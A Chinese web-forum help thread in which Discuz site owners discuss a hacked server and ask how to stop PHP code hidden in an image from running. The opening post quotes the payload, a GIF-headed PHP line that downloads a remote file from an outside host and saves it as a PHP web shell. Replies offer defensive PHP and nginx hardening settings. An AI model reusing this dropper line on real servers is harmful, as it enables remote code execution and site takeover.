如何禁止服务器上的图片中包含的这个代码不运行？

paladinet · 发表于 2020-3-18 20:03:19

图片中包含的代码如下： GIF89a<?php copy('http://www.discuz.pub/dama.txt','123asx.php');
请教，如何让这个不运行!!!

我知道答案回答被采纳将会获得1 贡献已有8人回答

jet · 发表于 2020-3-18 21:16:01

我的也是，

Failure · 发表于 2020-3-18 21:17:30

什么环境下？

老周部落 · 发表于 2020-3-18 21:47:38

本帖最后由老周部落于 2020-3-19 09:39 编辑

1. 请问木马文件被上传到哪个目录？

2. 如果是Windows请确认以下设置如图所示。

3. 如果使用nginx，要保证php配置中cgi.fix_pathinfo = 0。

4. 如果使用php-fpm，那么设置中的security.limit_extensions只有.php。

paladinet · 发表于 2020-3-19 11:44:29

Failure 发表于 2020-3-18 21:17
什么环境下？

IIS + php7.3

paladinet · 发表于 2020-3-19 11:46:39

老周部落发表于 2020-3-18 21:47
1. 请问木马文件被上传到哪个目录？

2. 如果是Windows请确认以下设置如图所示。

目录： uc_server/data/avatar/下的一个目录内

之前就是按图设置的。

paladinet · 发表于 2020-3-19 11:46:52

jet 发表于 2020-3-18 21:16
我的也是，

你的解决了么？

老周部落 · 发表于 2020-3-19 15:34:24

paladinet 发表于 2020-3-19 11:46
目录： uc_server/data/avatar/下的一个目录内

之前就是按图设置的。

您现在访问能运行么？

lookboy · 发表于 2020-3-20 14:02:31

本帖最后由 lookboy 于 2020-3-20 14:08 编辑

前几天我的服务器被攻击
第一次发现病毒被伪装成图片格式隐藏在两年前的图片文件夹里

[求助] 如何禁止服务器上的图片中包含的这个代码不运行？